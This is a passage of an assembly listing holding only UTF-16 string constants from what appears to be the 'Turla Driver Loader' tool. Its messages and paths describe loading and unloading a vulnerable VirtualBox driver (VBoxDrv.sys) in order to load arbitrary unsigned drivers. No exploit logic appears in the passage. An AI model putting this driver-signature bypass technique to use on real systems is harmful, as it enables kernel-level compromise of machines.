00H DB 'u', 00H, 'p', 00H, ' ', 00H, 'w', 00H, 'i', 00H, 'l', 00H, 'l' DB 00H, ' ', 00H, 'b', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H DB 'n', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ CONST SEGMENT ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ DB ' ', 00H, 'b' DB 00H, 'u', 00H, 'i', 00H, 'l', 00H, 'd', 00H, ' ', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_13JOFGPIOO@?$AA?4@ CONST SEGMENT ??_C@_13JOFGPIOO@?$AA?4@ DB '.', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ CONST SEGMENT ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, 'v' DB 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ CONST SEGMENT ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ DB 'U' DB 00H, 'n', 00H, 's', 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H DB 'r', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'W', 00H, 'i' DB 00H, 'n', 00H, 'N', 00H, 'T', 00H, ' ', 00H, 'v', 00H, 'e', 00H DB 'r', 00H, 's', 00H, 'i', 00H, 'o', 00H, 'n', 00H, 0dH, 00H, 0aH DB 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ CONST SEGMENT ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ DB 'A' DB 00H, 'n', 00H, 'o', 00H, 't', 00H, 'h', 00H, 'e', 00H, 'r', 00H DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'n' DB 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'u', 00H, 'n', 00H DB 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ',', 00H, ' ', 00H, 'c' DB 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, 'i', 00H DB 't', 00H, ' ', 00H, 'b', 00H, 'e', 00H, 'f', 00H, 'o', 00H, 'r' DB 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ CONST SEGMENT ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T' DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L' DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' ' DB 00H, 's', 00H, 't', 00H, 'a', 00H, 'r', 00H, 't', 00H, 'e', 00H DB 'd', 00H, 0dH, 00H, 0aH, 00H, '(', 00H, 'c', 00H, ')', 00H, ' ' DB 00H, '2', 00H, '0', 00H, '1', 00H, '6', 00H, ' ', 00H, '-', 00H DB ' ', 00H, '2', 00H, '0', 00H, '1', 00H, '9', 00H, ' ', 00H, 'T' DB 00H, 'D', 00H, 'L', 00H, ' ', 00H, 'P', 00H, 'r', 00H, 'o', 00H DB 'j', 00H, 'e', 00H, 'c', 00H, 't', 00H, 0dH, 00H, 0aH, 00H, 'S' DB 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H, 'r', 00H, 't', 00H DB 'e', 00H, 'd', 00H, ' ', 00H, 'x', 00H, '6', 00H, '4', 00H, ' ' DB 00H, 'O', 00H, 'S', 00H, ' ', 00H, ':', 00H, ' ', 00H, '7', 00H DB ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'b' DB 00H, 'o', 00H, 'v', 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ CONST SEGMENT ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T' DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L' DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' ' DB 00H, '(', 00H, '1', 00H, '9', 00H, '/', 00H, '0', 00H, '4', 00H DB '/', 00H, '1', 00H, '9', 00H, ')', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ CONST SEGMENT ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'f', 00H, 'i', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ CONST SEGMENT ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ DB 'U' DB 00H, 's', 00H, 'a', 00H, 'g', 00H, 'e', 00H, ':', 00H, ' ', 00H DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ' DB 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H DB 'T', 00H, 'o', 00H, 'L', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 0aH DB 00H, 0dH, 00H, 'e', 00H, '.', 00H, 'g', 00H, '.', 00H, ' ', 00H DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ' DB 00H, 'm', 00H, 'y', 00H, 'd', 00H, 'r', 00H, 'v', 00H, '.', 00H DB 's', 00H, 'y', 00H, 's', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ CONST SEGMENT ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e' DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e' DB 00H, ' ', 00H, 'r', 00H, 'e', 00H, 's', 00H, 't', 00H, 'o', 00H DB 'r', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'o', 00H, 'r' DB 00H, 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r' DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ CONST SEGMENT ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'r', 00H DB 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H, ' ' DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r' DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'r', 00H DB 'e', 00H, 's', 00H, 't', 00H, 'o', 00H, 'r', 00H, 'e', 00H, 'd' DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ CONST SEGMENT ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm' DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ' DB 00H, 'f', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ CONST SEGMENT ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm', 00H DB 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ CONST SEGMENT ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ DB '\' DB 00H, '?', 00H, '?', 00H, '\', 00H, 'g', 00H, 'l', 00H, 'o', 00H DB 'b', 00H, 'a', 00H, 'l', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't' DB 00H, '\', 00H, 's', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H DB 'm', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't', 00H, '\', 00H, 's' DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, '3', 00H DB '2', 00H, '\', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e' DB 00H, 'r', 00H, 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H DB 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y' DB 00H, 's', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ CONST SEGMENT ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm' DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ' DB 00H, 'e', 00H, 'n', 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H DB 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e' DB 00H, 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ CONST SEGMENT ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'e', 00H, 'n' DB 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'r', 00H, 'e', 00H DB 'm', 00H, 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'f' DB 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e', 00H DB 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H, 00H DB 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ CONST SEGMENT ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e' DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e' DB 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'd', 00H, 'r' DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ CONST SEGMENT ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 's', 00H, 'u', 00H, 'c', 00H, 'c' DB 00H, 'e', 00H, 's', 00H, 's', 00H, 'f', 00H, 'u', 00H, 'l', 00H DB 'l', 00H, 'y', 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o' DB 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ CONST SEGMENT ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'C', 00H, 'a', 00H DB 'n', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H, 'o', 00H, 'p' DB 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'd', 00H, 'a', 00H, 't', 00H DB 'a', 00H, 'b', 00H, 'a', 00H, 's', 00H, 'e', 00H, ',', 00H, ' ' DB 00H, 'u', 00H, 'n', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H DB ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H DB 'r', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ CONST SEGMENT ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'i', 00H, 'n', 00H, 'g' DB 00H, ' ', 00H, 'v', 00H, 'u', 00H, 'l', 00H, 'n', 00H, 'e', 00H DB 'r', 00H, 'a', 00H, 'b', 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd' DB 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ CONST SEGMENT ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'u', 00H DB 'r', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ CONST SEGMENT ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'd', 00H, 'e' DB 00H, 'v', 00H, 'i', 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'o', 00H DB 'p', 00H, 'e', 00H, 'n', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i' DB 00H, 'l', 00H, 'u', 00H, 'r', 00H, 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ CONST SEGMENT ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l' DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd' DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H DB ' ', 00H, 'o', 00H, 'p', 00H, 'e', 00H, 'n', 00H, 'e', 00H, 'd' DB 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ CONST SEGMENT ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'r', 00H, 'i' DB 00H, 't', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H DB 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B' DB 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'o', 00H, 'n', 00H, ' ', 00H DB 'd', 00H, 'i', 00H, 's', 00H, 'k', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ CONST SEGMENT ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ DB '\' DB 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H DB 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D' DB 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y', 00H, 's', 00H DB 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ CONST SEGMENT ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'i', 00H DB 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o' DB 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H DB 'e', 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k' DB 00H, 'u', 00H, 'p', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'n', 00H DB 'e', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ CONST SEGMENT ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i' DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H, 'i', 00H DB 'n', 00H, 'g', 00H, ' ', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't' DB 00H, 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r' DB 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H DB 'p', 00H, 00H, 00H ; `string' CONST ENDS ; COMDAT ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ CONST SEGMENT ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ DB 'S' DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 's', 00H, 't', 00H, 'o' DB 00H, 'p', 00H, 'p', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H DB 'V', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 'D', 00H, 'r', 00H, 'v' DB 00H, ',', 00H, 